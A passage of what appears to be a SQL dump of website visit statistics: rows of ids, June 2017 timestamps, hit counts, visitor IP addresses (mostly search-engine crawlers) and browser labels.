7,1,1,0,0,'164.132.161.4','other'),(117684,1496516582,1,1,0,0,'157.55.39.246','other'),(117685,1496516765,1,1,0,0,'217.182.132.178','other'),(117686,1496517071,1,1,0,0,'137.74.207.170','other'),(117687,1496517080,1,1,0,0,'217.182.132.92','other'),(117688,1496517151,1,1,0,0,'51.255.71.125','other'),(117689,1496517606,1,1,0,0,'66.249.65.57','chrome'),(117690,1496517987,1,1,0,0,'66.249.65.60','chrome'),(117691,1496518292,1,1,0,0,'164.132.161.20','other'),(117692,1496518595,1,1,0,0,'8.29.198.25','other'),(117693,1496518709,1,1,0,0,'217.182.132.240','other'),(117694,1496518796,1,1,0,0,'51.255.65.21','other'),(117695,1496519323,1,1,0,0,'164.132.161.43','other'),(117696,1496519761,1,0,1,0,'66.249.65.60',''),(117697,1496519805,5,5,0,0,'66.249.65.55','chrome'),(117698,1496519928,2,2,0,0,'66.249.65.56','chrome'),(117699,1496520755,1,0,1,0,'66.249.65.61',''),(117700,1496521481,1,1,0,0,'164.132.161.55','other'),(117701,1496522069,1,1,0,0,'217.182.132.74','other'),(117702,1496522232,1,1,0,0,'51.255.65.72','other'),(117703,1496522559,1,1,0,0,'217.182.132.52','other'),(117704,1496522868,1,1,0,0,'54.165.59.7','other'),(117705,1496523215,2,2,0,0,'91.209.11.236','other'),(117706,1496523561,1,1,0,0,'164.132.161.56','other'),(117707,1496523951,1,1,0,0,'217.182.132.21','other'),(117708,1496524795,1,0,1,0,'66.249.65.62',''),(117709,1496524828,1,0,1,0,'66.249.65.56',''),(117710,1496524940,1,1,0,0,'217.182.132.77','other'),(117711,1496525190,1,1,0,0,'66.249.65.55','chrome'),(117712,1496525195,2,2,0,0,'66.249.65.61','chrome'),(117713,1496525212,3,3,0,0,'66.249.65.56','chrome'),(117714,1496525347,2,1,1,0,'66.249.65.62',''),(117715,1496525572,2,2,0,0,'54.165.59.7','other'),(117716,1496525576,1,1,0,0,'217.182.132.174','other'),(117717,1496525769,1,1,0,0,'66.249.65.60','chrome'),(117718,1496526563,1,1,0,0,'217.182.132.90','other'),(117719,1496526624,1,0,1,0,'66.249.65.56',''),(117720,1496526920,2,1,1,0,'66.249.65.57',''),(117721,1496526972,1,1,0,0,'217.182.132.185','other'),(117722,1496527015,3,0,3,0,'66.249.65.60',''),(117723,1496527155,1,1,0,0,'157.55.39.232','other'),(117724,1496527354,2,1,1,0,'66.249.65.57',''),(117725,1496528050,1,1,0,0,'217.182.132.178','other'),(117726,1496528187,1,0,1,0,'66.249.65.60',''),(117727,1496529170,1,1,0,0,'51.255.65.8','other'),(117728,1496529437,1,1,0,0,'8.29.198.25','other'),(117729,1496529634,1,1,0,0,'164.132.161.71','other'),(117730,1496529688,1,0,1,0,'66.249.65.61',''),(117731,1496529717,1,0,1,0,'66.249.65.60',''),(117732,1496529873,1,1,0,0,'91.209.11.236','other'),(117733,1496529910,1,1,0,0,'51.255.65.69','other'),(117734,1496530123,1,1,0,0,'217.182.132.30','other'),(117735,1496530626,2,2,0,0,'66.249.65.55','chrome'),(117736,1496530696,1,1,0,0,'51.255.65.19','other'),(117737,1496531151,1,1,0,0,'91.209.11.236','other'),(117738,1496531457,1,1,0,0,'51.255.65.96','other'),(117739,1496531762,1,1,0,0,'217.182.132.6','other'),(117740,1496531879,1,1,0,0,'164.132.161.80','other'),(117741,1496531960,2,2,0,0,'66.249.65.57','chrome'),(117742,1496531964,3,3,0,0,'66.249.65.55','chrome'),(117743,1496532002,1,1,0,0,'51.255.65.55','other'),(117744,1496532093,1,1,0,0,'51.255.65.84','other'),(117745,1496532302,1,1,0,0,'40.77.167.39','other'),(117746,1496532426,1,1,0,0,'91.209.11.236','other'),(117747,1496532539,1,1,0,0,'66.102.9.27','chrome'),(117748,1496532729,1,1,0,0,'51.255.65.44','other'),(117749,1496533069,1,1,0,0,'5.255.253.83','other'),(117750,1496534117,1,0,1,0,'66.249.65.60',''),(117751,1496534180,1,0,1,0,'66.249.65.62',''),(117752,1496534366,1,1,0,0,'91.209.11.236','other'),(117753,1496535074,1,1,0,0,'51.255.65.19','other'),(117754,1496535380,1,1,0,0,'51.255.65.15','other'),(117755,1496535464,1,0,1,0,'68.180.230.48',''),(117756,1496535556,1,0,1,0,'66.249.65.60',''),(117757,1496535686,1,1,0,0,'164.132.162.154','other'),(117758,1496535789,1,1,0,0,'51.255.65.43','other'),(117759,1496535885,1,0,1,0,'66.249.65.56',''),(117760,1496536177,1,0,1,0,'66.249.65.55',''),(117761,1496536214,1,1,0,0,'51.255.65.29','other'),(117762,1496536270,1,1,0,0,'51.255.65.23','other'),(117763,1496536907,1,1,0,0,'164.132.164.180','other'),(117764,1496537009,1,1,0,0,'164.132.161.46','other'),(117765,1496537484,1,1,0,0,'40.77.167.39','other'),(117766,1496537513,1,1,0,0,'51.255.71.128','other'),(117767,1496537665,1,1,0,0,'128.69.148.63','msie'),(117768,1496537792,3,0,3,0,'66.249.65.62',''),(117769,1496537917,1,1,0,0,'66.249.65.55','chrome'),(117770,1496537972,2,2,0,0,'66.249.65.57','chrome'),(117771,1496538241,1,1,0,0,'164.132.161.69','other'),(117772,1496538256,1,1,0,0,'217.182.132.54','other'),(117773,1496538362,1,1,0,0,'164.132.161.18','other'),(117774,1496538425,1,1,0,0,'51.255.65.32','other'),(117775,1496538500,1,1,0,0,'66.249.65.56','chrome'),(117776,1496538936,1,1,0,0,'217.182.132.146','other'),(117777,1496539484,1,1,0,0,'66.249.65.55','chrome'),(117778,1496539770,1,1,0,0,'217.182.132.15','other'),(117779,1496539918,1,0,1,0,'66.249.65.60',''),(117780,1496540029,1,1,0,0,'109.192.228.149','chrome'),(117781,1496540280,1,1,0,0,'8.29.198.26','other'),(117782,1496540878,1,1,0,0,'217.182.132.149','other'),(117783,1496541219,2,0,2,0,'66.249.65.60',''),(117784,1496541387,1,1,0,0,'164.132.161.82','other'),(117785,1496541822,1,1,0,0,'51.255.65.96','other'),(117786,1496542741,1,1,0,0,'164.132.161.54','other'),(117787,1496543440,1,1,0,0,'51.255.65.34','other'),(117788,1496543662,1,1,0,0,'164.132.162.187','other'),(117789,1496543875,1,1,0,0,'137.74.201.100','other'),(117790,1496544230,1,1,0,0,'51.255.65.4','other'),(117791,1496544265,1,0,1,0,'66.249.65.55',''),(117792,1496544667,1,0,1,0,'66.249.65.60',''),(117793,1496544684,1,1,0,0,'51.255.71.115','other'),(117794,1496544760,1,1,0,0,'51.255.65.60','other'),(117795,1496544782,3,2,1,0,'66.249.65.62',''),(117796,1496544788,1,1,0,0,'66.249.65.61','chrome'),(117797,1496544920,1,1,0,0,'164.132.161.10','other'),(117798,1496545422,1,1,0,0,'51.255.65.34','other'),(117799,1496545470,1,1,0,0,'164.132.161.29','other'),(117800,1496545765,1,1,0,0,'164.132.162.187','other'),(117801,1496545985,1,1,0,0,'137.74.201.99','other'),(117802,1496546582,1,1,0,0,'164.132.161.66','other'),(117803,1496547010,1,1,0,0,'217.182.132.178','other'),(117804,1496547170,1,1,0,0,'217.182.132.60','other'),(117805,1496547450,1,1,0,0,'217.182.132.191','other'),(117806,1496547752,1,0,1,0,'66.249.65.61',''),(117807,1496548502,1,1,0,0,'164.132.161.24','other'),(117808,1496548506,1,1,0,0,'91.196.178.66','chrome'),(117809,1496548767,1,0,1,0,'66.249.65.61',''),(117810,1496548769,1,0,1,0,'66.249.65.56',''),(117811,1496548807,1,1,0,0,'217.182.132.56','other'),(117812,1496548949,1,1,0,0,'66.249.65.57','chrome'),(117813,1496548954,1,1,0,0,'164.132.161.75','other'),(117814,1496548971,1,1,0,0,'66.249.65.55','chrome'),(117815,1496549177,1,1,0,0,'51.255.65.52','other'),(117816,1496549382,2,2,0,0,'66.249.65.56','chrome'),(117817,1496549713,1,1,0,0,'137.74.207.110','other'),(117818,1496549878,1,1,0,0,'51.255.71.121','other'),(117819,1496549892,1,1,0,0,'5.228.6.175','msie'),(117820,1496550724,1,1,0,0,'51.255.65.84','other'),(117821,1496550783,1,0,1,0,'66.249.65.60',''),(117822,1496550792,1,1,0,0,'217.182.132.34','other'),(117823,1496550822,1,1,0,0,'137.74.207.164','other'),(117824,1496550871,1,1,0,0,'178.154.200.64','other'),(117825,1496551016,1,1,0,0,'157.55.39.232','other'),(117826,1496551111,1,1,0,0,'164.132.161.25','other'),(117827,1496551114,1,1,0,0,'8.29.198.26','other'),(117828,1496551441,1,1,0,0,'66.249.65.55','chrome'),(117829,1496551920,1,0,1,0,'66.249.65.62',''),(117830,1496551926,1,1,0,0,'66.249.65.56','chrome'),(117831,1496552722,1,1,0,0,'176.31.231.10','other'),(117832,1496552756,1,1,0,0,'40.77.167.39','other'),(117833,1496553487,1,1,0,0,'164.132.162.187','other'),(117834,1496553672,1,1,0,0,'164.132.161.86','other'),(117835,1496553753,2,2,0,0,'91.209.11.236','other'),(117836,1496553780,1,1,0,0,'217.182.132.84','other'),(117837,1496554358,1,0,1,0,'68.180.230.48',''),(117838,1496554515,2,0,2,0,'66.249.65.60',''),(117839,1496554609,2,2,0,0,'66.249.65.55','chrome'),(117840,1496554846,1,1,0,0,'217.182.132.52','other'),(117841,1496554907,2,2,0,0,'66.249.65.56','chrome'),(117842,1496555103,1,0,1,0,'66.249.65.62',''),(117843,1496555106,1,1,0,0,'164.132.161.70','other'),(117844,1496555168,1,0,1,0,'66.249.65.61',''),(117845,1496555207,1,1,0,0,'66.249.65.60','chrome'),(117846,1496555699,1,1,0,0,'54.165.59.7','other'),(117847,1496556097,1,1,0,0,'51.255.71.112','other'),(117848,1496556566,1,0,1,0,'66.249.65.61',''),(117849,1496556621,1,0,1,0,'68.180.230.48',''),(117850,1496556981,1,1,0,0,'217.182.132.74','other'),(117851,1496557225,1,1,0,0,'54.165.59.7','other'),(117852,1496557432,2,2,0,0,'51.255.71.112','other'),(117853,1496557468,1,0,1,0,'66.249.65.61',''),(117854,1496557629,3,3,0,0,'66.249.65.55','chrome'),(117855,1496558009,1,1,0,0,'164.132.161.91','other'),(117856,1496558473,1,1,0,0,'157.55.39.246','other'),(117857,1496558690,1,1,0,0,'164.132.161.24','other'),(117858,1496558821,1,1,0,0,'164.132.161.52','other'),(117859,1496559102,1,1,0,0,'164.132.161.94','other'),(117860,1496559292,1,1,0,0,'217.182.132.68','other'),(117861,1496559374,1,1,0,0,'51.255.65.35','other'),(117862,1496559584,1,0,1,0,'66.249.65.57',''),(117863,1496560421,1,1,0,0,'51.255.65.96','other'),(117864,1496560444,1,1,0,0,'164.132.161.2','other'),(117865,1496560449,1,0,1,0,'66.249.65.62',''),(117866,1496560455,2,0,2,0,'66.249.65.55',''),(117867,1496560490,1,0,1,0,'66.249.65.61',''),(117868,1496560605,1,1,0,0,'5.228.6.175','msie'),(117869,1496560623,1,1,0,0,'164.132.161.74','other'),(117870,1496560713,1,1,0,0,'217.182.132.19','other'),(117871,1496560798,1,1,0,0,'51.255.65.6','other'),(117872,1496561308,1,1,0,0,'217.182.132.59','other'),(117873,1496561355,1,1,0,0,'164.132.161.15','other'),(117874,1496561443,1,1,0,0,'40.77.167.39','other'),(117875,1496561497,173,173,0,0,'5.9.88.103','other'),(117876,1496561598,1,1,0,0,'51.255.71.112','other'),(117877,1496561902,1,1,0,0,'164.132.161.32','other'),(117878,1496561958,1,1,0,0,'8.29.198.26','other'),(117879,1496562077,1,1,0,0,'95.158.38.129','chrome'),(117880,1496562771,1,1,0,0,'137.74.207.170','other'),(117881,1496562988,1,1,0,0,'217.182.132.190','other'),(117882,1496563432,1,1,0,0,'164.132.161.48','other'),(117883,1496564637,1,1,0,0,'91.209.11.236','other'),(117884,1496564785,1,0,1,0,'66.249.65.56',''),(117885,1496564978,1,1,0,0,'51.255.65.18','other'),(117886,1496565059,1,1,0,0,'164.132.164.180','other'),(117887,1496565209,1,1,0,0,'217.182.132.185','other'),(117888,1496565276,1,1,0,0,'217.182.132.14','other'),(117889,1496565388,1,1,0,0,'164.132.161.29','other'),(117890,1496565722,1,1,0,0,'51.255.71.131','other'),(117891,1496566206,3,0,3,0,'66.249.65.61',''),(117892,1496566218,1,1,0,0,'51.255.65.87','other'),(117893,1496566250,2,2,0,0,'66.249.65.56','chrome'),(117894,1496566256,1,0,1,0,'66.249.65.60',''),(117895,1496566260,1,1,0,0,'164.132.161.30','other'),(117896,1496566335,1,1,0,0,'51.255.71.115','other'),(117897,1496566811,1,1,0,0,'66.249.65.62','chrome'),(117898,1496567093,1,1,0,0,'137.74.207.109','other'),(117899,1496568078,1,1,0,0,'217.182.132.86','other'),(117900,1496568087,1,1,0,0,'66.249.65.55','chrome'),(117901,1496568408,1,1,0,0,'66.249.65.57','chrome'),(117902,1496569043,1,1,0,0,'157.55.39.232','other'),(117903,1496569643,1,1,0,0,'164.132.161.39','other'),(117904,1496570303,1,0,1,0,'66.249.65.55',''),(117905,1496570351,2,0,2,0,'66.249.65.60',''),(117906,1496570400,2,0,2,0,'66.249.65.61',''),(117907,1496571038,1,1,0,0,'217.182.132.83','other'),(117908,1496571287,1,1,0,0,'66.249.65.56','chrome'),(117909,1496571330,1,1,0,0,'5.228.6.175','msie'),(117910,1496571687,1,1,0,0,'137.74.201.108','other'),(117911,1496571890,1,1,0,0,'217.182.132.95','other'),(117912,1496572149,1,1,0,0,'66.249.65.57','chrome'),(117913,1496572495,1,0,1,0,'66.249.65.62',''),(117914,1496572738,1,1,0,0,'164.132.161.73','other'),(117915,1496572790,1,1,0,0,'8.29.198.26','other'),(117916,1496572969,1,1,0,0,'164.132.161.55','other'),(117917,1496572972,1,1,0,0,'217.182.132.20','other'),(117918,1496573866,1,1,0,0,'94.178.147.229','opera'),(117919,1496574872,1,1,0,0,'66.249.65.61','chrome'),(117920,1496574906,1,1,0,0,'66.249.65.56','chrome'),(117921,1496575115,1,1,0,0,'164.132.161.77','other'),(117922,1496575516,1,1,0,0,'181.214.1.20','other'),(117923,1496576057,1,1,0,0,'162.210.196.97','other'),(117924,1496576859,2,0,2,0,'66.249.65.61',''),(117925,1496576954,3,3,0,0,'66.249.65.55','chrome'),(117926,1496577574,1,1,0,0,'66.249.65.57','chrome'),(117927,1496577744,1,1,0,0,'217.182.132.93','other'),(117928,1496578260,1,1,0,0,'51.255.71.116','other'),(117929,1496578926,1,1,0,0,'217.182.132.180','other'),(117930,1496579080,2,2,0,0,'51.255.65.66','other'),(117931,1496579155,1,1,0,0,'180.76.15.151','other'),(117932,1496579501,1,1,0,0,'137.74.203.194','other'),(117933,1496579742,1,1,0,0,'66.249.65.55','chrome'),(117934,1496580109,1,1,0,0,'40.77.167.39','other'),(117935,1496580168,1,1,0,0,'217.182.132.14','other'),(117936,1496580235,1,1,0,0,'51.255.71.115','other'),(117937,1496580251,2,2,0,0,'141.8.142.15','other'),(117938,1496580330,1,1,0,0,'217.182.132.4','other'),(117939,1496580376,1,1,0,0,'51.255.71.122','other'),(117940,1496580510,1,1,0,0,'217.182.132.183','other'),(117941,1496580835,2,0,2,0,'66.249.65.57',''),(117942,1496581035,1,1,0,0,'51.255.65.87','other'),(117943,1496581062,1,1,0,0,'51.255.65.38','other'),(117944,1496581281,1,0,1,0,'66.249.65.61',''),(117945,1496581405,1,1,0,0,'51.255.65.26','other'),(117946,1496581558,2,0,2,0,'66.249.65.56',''),(117947,1496581910,1,1,0,0,'51.255.65.6','other'),(117948,1496582252,1,1,0,0,'164.132.161.22','other'),(117949,1496582698,1,1,0,0,'95.108.179.15','other'),(117950,1496583449,1,1,0,0,'164.132.161.14','other'),(117951,1496583511,1,1,0,0,'217.182.132.156','other'),(117952,1496583619,1,1,0,0,'8.29.198.25','other'),(117953,1496584284,1,1,0,0,'164.132.161.20','other'),(117954,1496584392,1,1,0,0,'51.255.71.119','other'),(117955,1496584804,1,1,0,0,'51.255.65.95','other'),(117956,1496584861,1,1,0,0,'164.132.161.7','other'),(117957,1496584908,1,1,0,0,'51.255.65.56','other'),(117958,1496585186,2,2,0,0,'40.77.167.17','other'),(117959,1496585624,1,1,0,0,'164.132.161.32','other'),(117960,1496585652,1,1,0,0,'51.255.65.8','other'),(117961,1496586107,15,15,0,0,'144.76.8.134','other'),(117962,1496586314,1,1,0,0,'51.255.65.75','other'),(117963,1496586752,1,1,0,0,'66.249.65.57','chrome'),(117964,1496586833,1,1,0,0,'51.255.71.111','other'),(117965,1496587486,1,0,1,0,'66.249.65.60',''),(117966,1496587541,1,1,0,0,'164.132.161.91','other'),(117967,1496587950,1,1,0,0,'164.132.161.63','other'),(117968,1496588028,1,1,0,0,'51.255.65.27','other'),(117969,1496588137,1,0,1,0,'66.249.65.61',''),(117970,1496588860,3,3,0,0,'91.209.11.236','other'),(117971,1496589267,1,0,1,0,'66.249.65.60',''),(117972,1496589478,2,0,2,0,'66.249.65.61',''),(117973,1496589607,1,0,1,0,'66.249.65.55',''),(117974,1496589718,1,1,0,0,'217.182.132.72','other'),(117975,1496590055,1,1,0,0,'91.209.11.236','other'),(117976,1496590352,1,1,0,0,'51.255.65.224','other'),(117977,1496590357,1,1,0,0,'164.132.161.22','other'),(117978,1496590650,1,0,1,0,'66.249.65.57',''),(117979,1496591225,1,0,1,0,'66.249.65.61',''),(117980,1496591356,1,1,0,0,'164.132.161.18','other'),(117981,1496591674,1,1,0,0,'164.132.162.156','other'),(117982,1496592637,1,1,0,0,'51.255.65.70','other'),(117983,1496592672,1,1,0,0,'164.132.161.78','other'),(117984,1496592765,1,1,0,0,'180.76.15.18','other'),(117985,1496592789,1,1,0,0,'51.255.65.87','other'),(117986,1496592992,1,1,0,0,'164.132.161.72','other'),(117987,1496593188,1,1,0,0,'217.182.132.94','other'),(117988,1496593337,1,0,1,0,'66.249.65.55',''),(117989,1496593641,1,1,0,0,'164.132.161.71','other'),(117990,1496593751,1,1,0,0,'164.132.161.39','other'),(117991,1496594374,1,1,0,0,'217.182.132.72','other'),(117992,1496594446,1,1,0,0,'8.29.198.25','other'),(117993,1496594685,1,1,0,0,'51.255.65.74','other'),(117994,1496594703,1,1,0,0,'51.255.65.83','other'),(117995,1496595040,1,0,1,0,'66.249.64.71',''),(117996,1496595073,1,0,1,0,'66.249.64.15',''),(117997,1496595099,1,0,1,0,'66.249.64.13',''),(117998,1496595138,1,1,0,0,'66.249.64.67','chrome'),(117999,1496595541,2,2,0,0,'157.55.39.232','other'),(118000,1496595662,1,1,0,0,'217.182.132.35','other'),(118001,1496595873,1,1,0,0,'164.132.161.38','other'),(118002,1496596138,1,1,0,0,'164.132.161.58','other'),(118003,1496596229,1,1,0,0,'95.108.179.8','other'),(118004,1496596539,1,1,0,0,'40.77.167.17','other'),(118005,1496597374,1,1,0,0,'51.255.71.132','other'),(118006,1496597699,1,1,0,0,'217.182.132.240','other'),(118007,1496598609,1,1,0,0,'51.255.65.22','other'),(118008,1496599210,1,1,0,0,'51.255.65.11','other'),(118009,1496599335,1,1,0,0,'180.76.15.8','other'),(118010,1496599763,1,1,0,0,'164.132.164.180','other'),(118011,1496600110,1,1,0,0,'137.74.207.102','other'),(118012,1496600226,1,1,0,0,'217.182.132.74','other'),(118013,1496600832,1,1,0,0,'164.132.161.37','other'),(118014,1496601005,1,0,1,0,'66.249.64.73',''),(118015,1496601335,1,1,0,0,'180.76.15.16','other'),(118016,1496601422,1,1,0,0,'91.209.11.236','other'),(118017,1496601589,1,1,0,0,'51.255.64.106','other'),(118018,1496601600,1,1,0,0,'217.182.132.19','other'),(118019,1496602135,1,1,0,0,'217.182.132.58','other'),(118020,1496602593,1,0,1,0,'66.249.64.67',''),(118021,1496602661,1,1,0,0,'46.211.136.190','chrome'),(118022,1496602832,1,0,1,0,'66.249.64.15',''),(118023,1496602859,1,0,1,0,'66.249.64.71',''),(118024,1496602893,1,1,0,0,'66.249.64.14','chrome'),(118025,1496603284,1,1,0,0,'91.209.11.236','other'),(118026,1496603577,1,1,0,0,'217.182.132.6','other'),(118027,1496603902,1,1,0,0,'157.55.39.232','other'),(118028,1496604220,1,1,0,0,'217.182.132.85','other'),(118029,1496604871,1,1,0,0,'91.209.11.236','other'),(118030,1496605280,1,1,0,0,'8.29.198.27','other'),(118031,1496605610,1,0,1,0,'66.249.64.14',''),(118032,1496606031,1,0,1,0,'66.249.64.13',''),(118033,1496606265,1,1,0,0,'217.182.132.185','other'),(118034,1496606350,1,1,0,0,'51.255.65.63','other'),(118035,1496606691,1,1,0,0,'95.132.30.91','firefox'),(118036,1496607773,1,1,0,0,'217.182.132.193','other'),(118037,1496607926,1,1,0,0,'51.255.65.93','other'),(118038,1496607929,5,5,0,0,'144.76.12.66','other'),(118039,1496608264,1,1,0,0,'217.182.132.21','other'),(118040,1496608389,1,1,0,0,'164.132.162.160','other'),(118041,1496608506,1,1,0,0,'164.132.161.32','other'),(118042,1496608550,1,1,0,0,'91.209.11.236','other'),(118043,1496608938,1,1,0,0,'51.255.71.129','other'),(118044,1496609052,1,1,0,0,'217.182.132.29','other'),(118045,1496609091,1,1,0,0,'164.132.161.27','other'),(118046,1496609184,1,1,0,0,'46.219.220.162','other'),(118047,1496609251,1,1,0,0,'217.182.132.24','other'),(118048,1496609340,1,1,0,0,'181.215.126.41','other'),(118049,1496609453,1,1,0,0,'51.255.65.74','other'),(118050,1496609667,1,1,0,0,'51.255.65.2','other'),(118051,1496609719,1,0,1,0,'66.249.64.67',''),(118052,1496609762,1,0,1,0,'66.249.64.13',''),(118053,1496609859,1,1,0,0,'91.209.11.236','other'),(118054,1496610280,1,1,0,0,'51.255.65.32','other'),(118055,1496610851,2,2,0,0,'91.209.11.236','other'),(118056,1496611384,1,1,0,0,'217.182.132.55','other'),(118057,1496611762,1,1,0,0,'164.132.161.33','other'),(118058,1496611857,1,0,1,0,'66.249.64.15',''),(118059,1496612397,1,1,0,0,'51.255.65.78','other'),(118060,1496612649,1,1,0,0,'51.255.65.69','other'),(118061,1496612908,1,1,0,0,'40.77.167.39','other'),(118062,1496612955,1,1,0,0,'51.255.65.30','other'),(118063,1496613077,1,1,0,0,'217.182.132.188','other'),(118064,1496613163,1,1,0,0,'164.132.161.30','other'),(118065,1496613202,1,1,0,0,'217.182.132.83','other'),(118066,1496613323,1,1,0,0,'91.209.11.236','other'),(118067,1496613631,1,1,0,0,'51.255.65.96','other'),(118068,1496613719,1,1,0,0,'51.255.65.9','other'),(118069,1496614631,1,0,1,0,'66.249.64.15',''),(118070,1496614720,1,0,1,0,'66.249.64.13',''),(118071,1496614830,2,2,0,0,'66.249.64.71','chrome'),(118072,1496614832,2,2,0,0,'66.249.64.73','chrome'),(118073,1496615111,2,2,0,0,'66.249.64.67','chrome'),(118074,1496615242,1,1,0,0,'217.182.132.51','other'),(118075,1496615599,1,0,1,0,'66.249.64.15',''),(118076,1496615784,1,1,0,0,'91.209.11.236','other'),(118077,1496615859,1,1,0,0,'164.132.161.59','other'),(118078,1496616030,1,1,0,0,'217.182.132.87','other'),(118079,1496616108,1,1,0,0,'8.29.198.25','other'),(118080,1496616380,1,1,0,0,'217.182.132.181','other'),(118081,1496616845,1,1,0,0,'217.182.132.96','other'),(118082,1496616999,2,1,1,0,'66.249.64.13',''),(118083,1496617561,1,1,0,0,'91.209.11.236','other'),(118084,1496617569,1,0,1,0,'66.249.64.15',''),(118085,1496617745,1,0,1,0,'66.249.64.71',''),(118086,1496617958,1,1,0,0,'51.255.65.52','other'),(118087,1496618407,1,0,1,0,'68.180.230.48',''),(118088,1496618751,1,1,0,0,'40.77.167.17','other'),(118089,1496618920,1,1,0,0,'164.132.161.84','other'),(118090,1496618945,1,1,0,0,'51.255.65.51','other'),(118091,1496619142,1,1,0,0,'217.182.132.85','other'),(118092,1496619349,1,0,1,0,'66.249.64.15',''),(118093,1496619398,1,1,0,0,'91.209.11.236','other'),(118094,1496619583,1,1,0,0,'217.182.132.77','other'),(118095,1496619919,1,1,0,0,'51.255.65.12','other'),(118096,1496620019,1,0,1,0,'66.249.64.13',''),(118097,1496620531,1,1,0,0,'217.182.132.78','other'),(118098,1496620984,1,0,1,0,'66.249.64.73',''),(118099,1496621113,1,1,0,0,'164.132.161.69','other'),(118100,1496621249,2,2,0,0,'91.209.11.236','other'),(118101,1496621431,2,2,0,0,'95.213.141.126','opera'),(118102,1496621546,1,1,0,0,'66.249.64.67','chrome'),(118103,1496621808,1,1,0,0,'164.132.162.153','other'),(118104,1496622353,1,0,1,0,'68.180.230.48',''),(118105,1496622576,1,0,1,0,'66.249.64.15',''),(118106,1496622587,1,0,1,0,'66.249.64.67',''),(118107,1496622756,1,0,1,0,'66.249.64.14',''),(118108,1496622762,1,0,1,0,'66.249.64.13',''),(118109,1496622970,1,1,0,0,'217.182.132.80','other'),(118110,1496623833,1,1,0,0,'91.209.11.236','other'),(118111,1496623870,1,0,1,0,'68.180.230.48',''),(118112,1496624523,1,0,1,0,'66.249.64.71',''),(118113,1496624636,1,1,0,0,'217.182.132.18','other'),(118114,1496624922,1,0,1,0,'68.180.230.48',''),(118115,1496625364,1,1,0,0,'164.132.161.36','other'),(118116,1496625630,1,1,0,0,'91.209.11.236','other'),(118117,1496626035,1,1,0,0,'51.255.65.70','other'),(118118,1496626354,1,0,1,0,'66.249.64.73',''),(118119,1496626930,1,0,1,0,'66.249.64.67',''),(118120,1496626947,1,1,0,0,'8.29.198.27','other'),(118121,1496627038,1,0,1,0,'66.249.64.13',''),(118122,1496627474,1,1,0,0,'91.209.11.236','other'),(118123,1496627603,1,1,0,0,'51.255.71.118','other'),(118124,1496627906,1,1,0,0,'164.132.161.69','other'),(118125,1496627977,1,1,0,0,'217.182.132.28','other'),(118126,1496628070,1,0,1,0,'66.249.64.14',''),(118127,1496628071,1,1,0,0,'51.255.65.47','other'),(118128,1496628413,1,1,0,0,'51.255.64.106','other'),(118129,1496629139,1,1,0,0,'217.182.132.56','other'),(118130,1496629852,1,0,1,0,'68.180.230.48',''),(118131,1496629870,1,1,0,0,'87.250.224.18','other'),(118132,1496630284,1,1,0,0,'217.182.132.183','other'),(118133,1496630324,2,2,0,0,'91.209.11.236','other'),(118134,1496630710,1,1,0,0,'137.74.207.164','other'),(118135,1496630846,1,0,1,0,'66.249.64.67',''),(118136,1496630914,1,0,1,0,'66.249.64.14',''),(118137,1496631083,1,1,0,0,'164.132.161.76','other'),(118138,1496631225,1,1,0,0,'91.209.11.236','other'),(118139,1496631436,1,0,1,0,'68.180.230.48',''),(118140,1496631619,1,0,1,0,'66.249.64.13',''),(118141,1496633902,1,1,0,0,'51.255.65.35','other'),(118142,1496633990,1,1,0,0,'164.132.161.71','other'),(118143,1496634690,1,1,0,0,'87.250.224.18','other'),(118144,1496634778,1,0,1,0,'66.249.64.81',''),(118145,1496634856,1,1,0,0,'51.255.65.8','other'),(118146,1496634857,1,1,0,0,'66.249.64.15','chrome'),(118147,1496634966,2,2,0,0,'66.249.64.14','chrome'),(118148,1496634997,2,2,0,0,'66.249.64.81','chrome'),(118149,1496635104,1,1,0,0,'66.249.64.85','chrome'),(118150,1496635162,1,1,0,0,'141.8.142.38','other'),(118151,1496635444,1,1,0,0,'91.209.11.236','other'),(118152,1496636041,1,0,1,0,'66.249.64.15',''),(118153,1496636457,1,1,0,0,'51.255.65.78','other'),(118154,1496636567,2,0,2,0,'66.249.64.13',''),(118155,1496636727,1,1,0,0,'164.132.161.84','other'),(118156,1496636777,1,1,0,0,'137.74.201.99','other'),(118157,1496636864,1,0,1,0,'66.249.64.14',''),(118158,1496637401,1,0,1,0,'66.249.64.73',''),(118159,1496637488,1,1,0,0,'51.255.65.56','other'),(118160,1496637547,1,1,0,0,'91.209.11.236','other'),(118161,1496637771,1,1,0,0,'8.29.198.27','other'),(118162,1496638066,1,0,1,0,'68.180.230.48',''),(118163,1496638437,1,0,1,0,'66.249.64.15',''),(118164,1496639226,1,1,0,0,'91.209.11.236','other'),(118165,1496639234,2,2,0,0,'137.74.207.159','other'),(118166,1496639323,1,1,0,0,'164.132.161.25','other'),(118167,1496639364,1,1,0,0,'51.255.65.21','other'),(118168,1496640005,1,1,0,0,'51.255.71.113','other'),(118169,1496640409,1,1,0,0,'66.34.115.15','other'),(118170,1496640513,1,1,0,0,'164.132.161.95','other'),(118171,1496641013,1,1,0,0,'164.132.161.91','other'),(118172,1496641080,1,1,0,0,'95.132.29.168','firefox'),(118173,1496641318,2,0,2,0,'66.249.64.14',''),(118174,1496641362,1,0,1,0,'66.249.64.13',''),(118175,1496642576,2,2,0,0,'91.209.11.236','other'),(118176,1496642721,1,1,0,0,'180.76.15.5','other'),(118177,1496643285,1,1,0,0,'54.165.59.7','other'),(118178,1496643606,1,0,1,0,'66.249.64.71',''),(118179,1496644158,1,1,0,0,'217.182.132.76','other'),(118180,1496644164,1,1,0,0,'164.132.161.66','other'),(118181,1496644339,1,1,0,0,'157.55.39.232','other'),(118182,1496644493,1,1,0,0,'178.140.81.108','msie'),(118183,1496644508,1,0,1,0,'66.249.64.14',''),(118184,1496644547,1,0,1,0,'66.249.64.73',''),(118185,1496644730,1,1,0,0,'164.132.161.11','other'),(118186,1496644757,1,1,0,0,'137.74.207.109','other'),(118187,1496644783,1,0,1,0,'66.249.64.67',''),(118188,1496645203,1,0,1,0,'66.249.64.71',''),(118189,1496645556,1,1,0,0,'164.132.162.157','other'),(118190,1496646132,1,1,0,0,'66.249.64.73','chrome'),(118191,1496646375,1,1,0,0,'51.255.65.61','other'),(118192,1496646384,2,2,0,0,'91.209.11.236','other'),(118193,1496646763,1,1,0,0,'193.164.95.197','other'),(118194,1496646809,1,1,0,0,'217.182.132.31','other'),(118195,1496647378,1,1,0,0,'91.196.178.33','chrome'),(118196,1496647607,1,1,0,0,'51.255.65.59','other'),(118197,1496647995,1,1,0,0,'91.209.11.236','other'),(118198,1496648293,1,1,0,0,'37.55.56.207','chrome'),(118199,1496648596,1,1,0,0,'8.29.198.27','other'),(118200,149